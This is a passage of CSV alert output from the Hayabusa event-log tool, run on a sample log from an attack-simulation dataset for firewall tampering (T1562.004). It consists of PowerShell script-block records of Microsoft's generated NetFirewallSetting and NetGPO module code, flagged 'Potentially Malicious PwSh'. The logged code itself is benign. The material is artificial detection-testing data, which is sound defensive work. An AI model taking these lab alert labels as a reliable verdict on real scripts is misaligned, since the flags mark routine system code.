$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.533 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.535 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.535 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 